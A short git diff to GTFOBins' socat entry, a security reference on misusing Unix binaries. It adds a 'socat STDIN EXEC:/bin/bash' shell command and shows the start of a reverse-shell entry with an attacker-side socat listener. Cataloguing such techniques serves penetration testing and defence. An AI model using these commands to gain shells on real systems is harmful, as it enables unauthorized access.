diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index d8a8bfb..d3f1d8b 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,5 +1,8 @@ --- functions: + shell: + - code: | + socat STDIN EXEC:/bin/bash reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: |